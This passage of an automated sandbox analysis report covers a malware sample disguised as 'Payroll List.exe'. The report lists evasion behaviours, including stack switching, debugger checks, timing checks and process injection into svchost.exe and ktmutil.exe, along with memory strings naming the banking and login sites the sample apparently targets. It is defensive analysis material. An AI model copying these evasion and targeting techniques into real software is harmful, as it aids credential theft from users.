00000006.00000003.1742406359.0000000002A44000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payroll List.exe, 00000000.00000003.1434270538.0000000003770000.00000004.00001000.00020000.00000000.sdmp, Payroll List.exe, 00000000.00000003.1427600863.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1639800247.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641453907.0000000003700000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000006.00000003.1744250358.0000000002BF6000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002F3E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1742406359.0000000002A44000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000002.00000002.1734052024.0000000003219000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734033314.0000000003200000.00000004.00000020.00020000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292022741.0000000001548000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000002.00000002.1734052024.0000000003219000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734033314.0000000003200000.00000004.00000020.00020000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292022741.0000000001548000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 00000006.00000002.3291580399.0000000002813000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3293451407.00000000033CC000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.00000000258CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 00000006.00000002.3291580399.0000000002813000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3293451407.00000000033CC000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.00000000258CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Payroll List.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Payroll List.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Payroll List.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Payroll List.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Payroll List.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013E01E LoadLibraryA,GetProcAddress,0_2_0013E01E
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013288A push 66001323h; retn 0019h0_2_001328E1
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00146B05 push ecx; ret 0_2_00146B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416096 push eax; ret 2_2_004160E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168B9 push 49A0F8CEh; ret 2_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004160BB push eax; ret 2_2_004160E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416970 push 49A0F8CEh; ret 2_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041692F push 49A0F8CEh; ret 2_2_00416912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004049B6 push cs; iretd 2_2_004049BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032E0 push eax; ret 2_2_004032E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415A90 push ds; retf 2_2_00415A93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041938B push ecx; retf 2_2_004193EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411BB6 push ecx; retf 2_2_00411BB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004065E5 push cs; ret 2_2_004065F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404E33 push ds; iretd 2_2_00404E63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D6C1 push ebp; retf 2_2_0040D6CA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404E91 push ds; iretd 2_2_00404E63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05190D40 push 49A0F8CEh; ret 4_2_05190CE2
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0517ED86 push cs; iretd 4_2_0517ED8A
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_051809B5 push cs; ret 4_2_051809C0
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05181C34 push ecx; ret 4_2_05181C72
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05190466 push eax; ret 4_2_051904B9
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05190C89 push 49A0F8CEh; ret 4_2_05190CE2
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0519048B push eax; ret 4_2_051904B9
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05181CC0 push ecx; ret 4_2_05181C72
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05190CFF push 49A0F8CEh; ret 4_2_05190CE2
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0518BF86 push ecx; retf 4_2_0518BF88
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_05181BB8 push ecx; ret 4_2_05181C72
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0517F203 push ds; iretd 4_2_0517F233
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0517F261 push ds; iretd 4_2_0517F233
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exeCode function: 4_2_0518FE60 push ds; retf 4_2_0518FE63
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00188111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00188111
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0013EB42
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0014123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0014123A
                Source: C:\Users\user\Desktop\Payroll List.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Payroll List.exeAPI/Special instruction interceptor: Address: D5808C
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Users\user\Desktop\Payroll List.exeEvaded block: after key decisiongraph_0-95573
                Source: C:\Users\user\Desktop\Payroll List.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-96022
                Source: C:\Users\user\Desktop\Payroll List.exeAPI coverage: 4.2 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\ktmutil.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 8044Thread sleep count: 41 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 8044Thread sleep time: -82000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe TID: 8056Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe TID: 8056Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00166CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00166CA9
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_001660DD
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_001663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_001663F9
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0016EB60
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016F56F FindFirstFileW,FindClose,0_2_0016F56F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0016F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0016F5FA
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00171B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00171B2F
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00171C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00171C8A
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00171F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00171F94
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0041C810 FindFirstFileW,FindNextFileW,FindClose,6_2_0041C810
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0013DDC0
                Source: 283026M3L.6.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 283026M3L.6.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: ktmutil.exe, 00000006.00000002.3296566813.00000000076CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494
                Source: 283026M3L.6.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 283026M3L.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 283026M3L.6.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 283026M3L.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 283026M3L.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 283026M3L.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 283026M3L.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.000000000385C000.00000004.00000001.00040000.00000000.sdmpBinary or memory string: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1fo=GF14svyhH44dt&NjHpTfh=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dMSPmSyMXvFwuhBmNF6SR00f5xEMx0RhVmciiGarBUFx9Q=="}</script></head></html>
                Source: firefox.exe, 0000000B.00000002.2046701731.00000262A57BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: eLiCpwzRIeWAs.exe, 00000007.00000002.3292122511.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: 283026M3L.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 283026M3L.6.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: ktmutil.exe, 00000006.00000002.3296566813.00000000076CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rd.comVMware20,11696494690f
                Source: 283026M3L.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: ktmutil.exe, 00000006.00000002.3296566813.00000000076CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 283026M3L.6.drBinary or memory string: global block list test formVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: ktmutil.exe, 00000006.00000002.3291580399.0000000002813000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                Source: 283026M3L.6.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 283026M3L.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 283026M3L.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 283026M3L.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 283026M3L.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 283026M3L.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\Payroll List.exeAPI call chain: ExitProcess graph end nodegraph_0-95353
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A83 LdrLoadDll,2_2_00417A83
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00176AAF BlockInput,0_2_00176AAF
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00123D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00123D19
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00153920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00153920
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_0013E01E LoadLibraryA,GetProcAddress,0_2_0013E01E
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00D582F8 mov eax, dword ptr fs:[00000030h]0_2_00D582F8
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00D58358 mov eax, dword ptr fs:[00000030h]0_2_00D58358
                Source: C:\Users\user\Desktop\Payroll List.exeCode function: 0_2_00D56CD8 mov eax, dword ptr fs:[00000030h]0_2_00D56CD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
